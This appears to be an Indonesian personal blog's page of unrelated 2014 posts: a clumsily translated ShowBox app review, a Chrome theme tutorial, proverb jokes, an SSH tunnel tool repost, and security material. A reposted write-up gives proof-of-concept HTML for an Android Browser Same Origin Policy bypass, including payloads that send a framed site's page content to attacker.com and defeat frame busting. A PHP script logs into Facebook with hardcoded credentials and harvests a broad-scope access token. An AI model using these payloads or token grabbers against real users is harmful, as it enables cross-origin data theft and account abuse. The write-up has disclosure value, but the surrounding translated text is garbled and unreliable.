31 Agu 2014

0 SHOW BOX WATCH YOUR FAVOuRITE TV SHOWS WHOLE SEASON AND NEW MOVIES


 As the title says you can watch all the seasons of your favourite shows or even download them


Have released a new series of favorite TV series? Download the torrent file from the torrent tracker, expect the process to download the video file, insert the flash drive into the usb input, download the uploaded file on the stick and now, when the joy of anticipation novelty strangled waiting (it is not important what his long, any pending annoying), see their sight. Phone – mobile smartphone – the powerful; Internet high speed. Catch the trend? Hence, the distance between the output of the new series and the fact that you will be able to see, should be minimal. And help us here the application Show Box (TV Series).

The first and the main tab of the application meets us with a scattering of posters of various series.
Show Box
Interesting episode in this diversity can be found by searching.
Search
Sort runoff series can by rating, title and date of the last series, and by genres.
Clicking on the posters of the series, you will find yourself in the beautifully designed site that is devoted to them. Here you can see a large banner show, and under it – series last season and selection tab a particular season.
Over the banner of three tabs: info; library; to share.
The first tab is a synopsis of the series. Tap on the second tab adds series in your library series. The third tab needs no introduction.
Download Show Box

Having defined with a specific series of view, you’re on the menu with a choice of characteristics: watch or download the series in the original or in English dubbing; how to download or to broadcast a series; and, finally, two large Taba – download series on the device or watch online.
As is customary on Android, can be viewed as a standard video player, and by the third party. Screenshot preview in MX Player:
showbox

Let us return to the three main tabs of the application, namely the second – library. There are going added serials, on pages of which you have clicked the button In the Library.» A kind of constant pool of your view.
Same here – and the list of uploaded\downloaded episodes.
The third tab of the application consists of sorting all of the series on the latest additions of the last series (with indication of the date of addition.
The application was initially has unobtrusive advertising in the form of a small pop-up banner while you pause during playback (when you resume playback, it will disappear), but also a huge banner that arise occasionally when you finish watching the series. Advertising of such a completely unobtrusive nature of the developer promised to remove «one day», if you click on a large banner.
Show Box APPS
Everything would be perfect, if not for one «but»! The only thing wildly lacks such application notifications about new episodes of TV series from your library. There is no doubt that in future updates of such a novelty will appear.
Download Here

0 Simple delete all aplication with Bookmark

What are Bookmarklets?

Google Chrome. Press [Ctrl][Shift][B] to bring down your Google Chrome bookmark bar. Drag-and-drop the bookmarklet links below into your bookmark bar, or Other bookmarks folder. You are done! Now, when you visit a page, just click on the bookmarklet you want to use.

Firefox. Press [Ctrl][B] to show your Firefox bookmark panel. Drag-and-drop the bookmarklet links below into your bookmark bar. You are done! Now, when you visit a page, just click on the bookmarklet you want to use. Works just like toolbar but without slowing down the browser.


 Remove all application

0 Refres Acces_Token For Bot (PHP)

<?php
$user="ardian.cuitcuitz"; //Email / User ID facebook
$pass="1122334455"; // Password

$data = "email=".$user."&pass=".$pass."&login=Mjemk";
$jem = curl("https://m.facebook.com/login.php", $data);
$jem = curl("https://www.facebook.com/dialog/oauth?redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fconnect%2Flogin_success.html&display=popup&scope=user_about_me,user_actions.news,user_friends,user_likes,user_photos,user_status,user_subscriptions,friends_about_me,friends_likes,friends_location,friends_notes,friends_status,manage_pages,publish_actions,publish_checkins,publish_stream,read_stream,share_item,status_update&response_type=token&sso_key=com&client_id=41158896424&_rdr");
$mbut = preg_match("/access_token=(.*?)&expires_in/i", $jem, $m);
$fp = fopen("jembut.txt", 'w') or die("mbut");
fwrite($fp, $m[1]);
fclose($fp);
echo $m[1];
function curl($url, $post=null){
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $url);
 if($post!=null){
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 }
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($ch, CURLOPT_HEADER, true);
 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
 curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
 curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
 $exec = curl_exec($ch);
 curl_close($ch);
 return $exec;
}
?>
Simpan script dengan nama token.php
Sebelum script di exsekusi klik ini dulu http://goo.gl/U0kyps

0 Re Post : N3 SSH Tunnel


Credits : Janggawareng
File Name : N3 SSH Tunnel.exe
File Size : 325 Kb (without installer)
Zip Size : 671 Kb
Scan Virus : Here
Download : View attachment N3 SSH Tunnel Installer.zip 


[​IMG]

Hi sobat n3 ....
aplikasi ini merupakan aplikasi penyempurnaan dari versi sebelumnya dan semoga lebih baik :mantap:

Notes:
  • Install terlebih dahulu Bitvise 4.60: cari disini Google
  • Install juga proxifier 3.21: cari disini Google
  • lalu open directory-nya lewat button dan arahkan ke BvSsh.exe dan Proxifier.exe
  • selanjutnya terserah bro mau dipake buat apa ini aplikasi (jangan tanya ke ane soal trik internet gratis hehehehe)
  • dan kalo ada yang tanya gimana makenya :dizzy: , yg jelas bro harus punya akun SSH-nya baru tau ntar maksudnya apa :grin:
  • terus kl bro ndak tau buat apa ini aplikasi :dizzy: , ya abaikan saja :ngacir: :ngacir: :ngacir:


Silahkan dishare keluar n3, dengan syarat cantumin sumber dan creditsnya
100% ane ndak ridho kl aplikasi ini dijadiin LINK RECEH zzzzz :cry: :cry:

0 RP: Android Browser same original polici Bypass

Introduction

Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute. However, the fundamental are that different origins should not be able to access the properties of one another.

SOP Bypass

A SOP bypass occurs when a sitea.com is some how able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected. To best of my knowledge, the issue occurred due to improper handling of nullbytes by url parser. 

The following is a proof of concept:

Proof Of Concept 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >

As you can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com.

Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match.

However, running it on any of the vulnerable smart phones default browsers would alert the document.domain property indicating that the SOP was not able to restrict the access to document.domain property of a site at a different origin.

I created the following POC, so you can mess around with some stuff:

Reading the response

You can read the response of any page by accessing the document.body.innerHTML property.

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >

Reading the response and sending it to an attackers domain

In real world situation an attacker would send the response to his controlled domain. 

<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Bypassing Frame Busting Code

A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.
<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >

Affected Versions

The initial tests were carried out on android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC wildfire, Sony Xperia, Qmobile etc.

The following are some of the smartphones i tested with browserstack.com.

Samsung Galaxy S3


Motrorolla Razr




Sony Xperia Tipo



HTC Evo 3D and Wildfire 


Hope you enjoyed it, Until next time. Pass the comments.

20 Jun 2014

0 Cara Membuat Tema Google Chrome Sendiri


Cara Membuat Tema Google Chrome Sendiri

Cara Membuat Tema Google Chrome Sendiri - Mungkin diantara anda ada yang belum tahu bahwa Google Chrome bisa diganti tampilannya dengan tema/skin yang menarik. Tema untuk Google Chrome mungkin sudah banyak bersebaran di Google dan bisa anda download sesuai minat anda. Tapi rasanya tidak puas jika tidak membuatnya sendiri kan? Saya juga berpikir demikian. Maka dari itu, saya akan tunjukkan pada anda cara membuat tema Google Chrome sendiri menggunakan Chrome Theme Creator Online.

1. Kunjungi situs Chrome Theme Creator Online.

2. Isi kolom "Theme Name" dengan nama tema yang anda inginkan.
3. Klik "Upload an Image" untuk mengupload gambar yang akan dijadikan background Chrome anda.
Cara Membuat Tema Google Chrome Sendiri

4. Klik "Generate Colors" untuk memadukan warna skin Chrome dengan gambar background yang tadi anda upload. Jika background berwarna dominan hitam, maka skin otomatis langsung berwarna hitam.

5. Sebelum itu, anda bisa mengatur posisi gambar agar menjadi layar penuh dengan mengubah ukurannya menjadi fill-screen.
Cara Membuat Tema Google Chrome Sendiri

6. Jika anda merasa puas, bisa langsung packing dan install ke Chrome dengan klik tombol "Pack and Install".

7. Tapi jika anda belum puas, anda bisa otak atik sebentar tampilan tema yang akan anda buat. Mari beralih dari tab menu Basic ke tab menu Images.

8. Disebelah kanan terdapat beberapa fitur. Untuk mengetahui masing-masing kegunaannya, perhatikan gambar di bawah ini. Masing-masing fitur tersebut sudah saya bedakan dengan warna.
Cara Membuat Tema Google Chrome Sendiri

- NTP Background untuk mengubah yang berwarna putih.
- Frame untuk mengubah yang berwarna merah.
- Toolbar untuk mengubah yang berwarna hijau.
- Tab Background untuk mengubah yang berwarna pink.
- Untuk yang Frame Overlay dan NTP Attribution abaikan saja.

9. Sekarang beralih ke tab menu Colors.

10. Disebelah kanan terdapat beberapa fitur. Untuk mengetahui masing-masing kegunaannya, perhatikan gambar di bawah ini. Masing-masing fitur tersebut sudah saya bedakan dengan warna.
Cara Membuat Tema Google Chrome Sendiri

- Status Bar untuk mengubah yang berwarna ungu.
- Tab Text untuk mengubah yang berwarna hitam.
- Background Tab Text untuk mengubah yang berwarna hitam.
- Bookmark Text untuk mengubah yang berwarna coklat.
- NTP Text untuk mengubah yang berwarna kuning.
- Buttons untuk mengubah yang berwarna abu-abu.
- Control Buttons untuk mengubah yang berwarna putih.

11. Terakhir masuk ke tab menu Pack.

12. Disitu terdapat beberapa menu.
Cara Membuat Tema Google Chrome Sendiri

- Pack and Install Theme untuk packing dan langsung menginstall tema ke Chrome.
- Pack and Download Theme untuk packing dan menyimpan tema dalam format .crx
- Pack and Download Zip File untuk packing dan menyimpan tema dalam format zip.
- Save Screenshot untuk menyimpan screenshot tampilan tema hasil buatan anda.

Apabila anda kebingungan, jangan ragu untuk bertanya, bukan bertanya dengan ragu.

Semoga bermanfaat ^_^

0 Plesetan Peribahasa Lucu Ala Cak Lontong

Plesetan Peribahasa Lucu Ala Cak Lontong

Plesetan Peribahasa Lucu Ala Cak Lontong - Anda tentu kenal dengan Cak Lontong kan? Komedian jebolan dari Stand Up Comedy ini menjadi semakin populer sejak mengisi program televisi Indonesia Lawak Klub. Diacara tersebut, dia dikenal sebagai orang yang selalu membuat semua orang merasa kesal dengan ucapannya. Mulai dari definisi suatu hal, survei-surveinya, bahkan yang baru-baru ini peribahasa. Peribahasa yang dilontarkan Cak Lontong selalu mengundang tawa karena meleset dari aslinya. Apa saja plesetan peribahasa lucu ala Cak Lontong? Yuk simak di bawah ini.

Air beriak tanda ada orang tenggelam
Originalnya : Air beriak tanda tak dalam

Dimana bumi dipijak, disitu mau ngapain?
Originalnya : Dimana bumi dipijak, disitu langit dijinjing

Buah jatuh tidak jauh, kok
Originalnya : Buah jatuh tidak jauh dari pohonnya

Bagai kacang lupa gak dimakan
Originalnya : Bagai kacang lupa sama kulitnya

Maling teriak maling lain dengar gak?
Originalnya : Maling teriak maling

2 3 4 kali mendayung, 1 pulau terlampaui
Originalnya : 1 kali mendayung, 2 3 pulau terlampaui

Sedia payung sebelum dan sesudahnya terima kasih
Originalnya : Sedia payung sebelum hujan

Tak kenal maka tak apalah
Originalnya : Tak kenal maka tak sayang

Berat sama dipikul, ringan mana?
Originalnya : Berat sama dipikul, ringan sama dijinjing

Asam di gunung, garam di laut, yang lainnya dimana?
Originalnya : Asam di gunung, garam di laut, bertemunya dalam satu belanga

Bermain air basah, bermain bola capek
Originalnya : Bermain air basah, bermain api terbakar

Bagai makan buah sima dan lakama
Originalnya : Bagai makan buah simalakama

Beli karung, eh di dalamnya ada kucing
Originalnya : Beli kucing dalam karung

Hujan emas di negeri orang, lebih enak orang di negeri itu dong?
Originalnya : Daripada hujan emas di negeri orang, lebih baik hujan batu di negeri sendiri

 

Devil Dawn [ Irzzat Badut ] Copyright © 2011 - |- Template created by O Pregador - |- Powered by Blogger Templates